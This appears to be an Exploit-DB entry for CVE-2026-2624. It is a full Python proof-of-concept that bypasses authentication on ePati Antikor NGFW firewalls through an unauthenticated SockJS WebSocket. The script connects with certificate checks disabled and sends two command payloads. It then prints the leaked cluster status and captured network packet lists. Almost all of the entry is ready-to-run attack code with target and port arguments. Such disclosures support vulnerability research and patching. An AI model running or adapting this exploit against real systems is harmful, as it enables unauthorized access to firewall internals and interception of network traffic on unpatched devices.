ePati Antikor NGFW 2.0.1301 - Authentication Bypass

EDB-ID:

52562

CVE:

2026-2624

EDB Verified:

Author:

sadik

Type:

webapps

Exploit:   /  

Platform:

Multiple

Date:

2026-05-14

Vulnerable App: 
# Exploit Title: ePati Antikor NGFW 2.0.1301 -  Authentication Bypass 
# Date: 2026-04-13
# Exploit Author: [SADIK ERTÜRK]
# Vendor Homepage: https://www.epati.com.tr/
# Software Link: https://www.epati.com.tr/antikor-ngfw/
# Version: v.2.0.1298 - v.2.0.1301
# Tested on: Linux / Antikor OS
# CVE: CVE-2026-2624

import websocket
import json
import ssl
import sys
import argparse
import random
import string
import time

def banner():
    print("-" * 65)
    print(" ePati Antikor NGFW Unauthenticated WebSocket Exploit")
    print(" CVE-2026-2624 | Author: [SADIK ERTÜRK]")
    print("-" * 65)

def generate_random_id(length=8):
    """Generates a random session ID for the SockJS connection."""
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))

def exploit(target_ip, target_port):
    # Generating random server and session IDs for SockJS
    server_id = random.randint(100, 999)
    session_id = generate_random_id()
    
    ws_url = f"wss://{target_ip}:{target_port}/sock/{server_id}/{session_id}/websocket"
    print(f"[*] Target WebSocket URL created: {ws_url}")
    print("[*] Connecting to the target... (Ignoring SSL certificate warnings)")

    try:
        # Bypassing Self-Signed SSL certificate verifications
        ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})
        ws.connect(ws_url)
        print("[+] Connection Successful! (Authentication bypassed)\n")
        
        # Payload 1: Listening to Cluster and System Status
        payload_1 = json.dumps(["{\"istekId\":\"req_init_01\",\"komut\":\"rapor-dinle\",\"parametreler\":[\"cluster-durum\"]}"])
        print("[*] Sending 1st payload: 'rapor-dinle' (cluster-status)...")
        ws.send(payload_1)

        # Wait for the response from the server
        time.sleep(1) 
        response_1 = ws.recv()
        
        if response_1:
            print("[+] SUCCESSFUL! Sensitive system data successfully leaked:")
            print(f"> {response_1}\n")
        
        # Payload 2: Listening to Network Packets
        payload_2 = json.dumps(["{\"istekId\":\"req_101\",\"komut\":\"paket-liste-dinle\",\"parametreler\":[]}"])
        print("[*] Sending 2nd payload: 'paket-liste-dinle' (network-packet-list)...")
        ws.send(payload_2)
        
        time.sleep(1)
        response_2 = ws.recv()
        
        if response_2:
            print("[+] Network packet data captured:")
            print(f"> {response_2}\n")

        print("[*] Exploitation complete. Closing connection.")
        ws.close()

    except websocket.WebSocketException as e:
        print(f"[-] WebSocket Error: {e}")
        print("[-] The target might be patched (v.2.0.1302+) or the port is closed.")
        sys.exit(1)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")
        sys.exit(1)

if __name__ == "__main__":
    banner()
    
    # Argument parsing
    parser = argparse.ArgumentParser(description="ePati Antikor NGFW WebSocket Auth Bypass PoC")
    parser.add_argument("-t", "--target", required=True, help="Target IP or Hostname (e.g., 192.168.1.10)")
    parser.add_argument("-p", "--port", default="8800", help="Target Port (Default: 8800)")
    
    args = parser.parse_args()
    
    exploit(args.target, args.port)
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services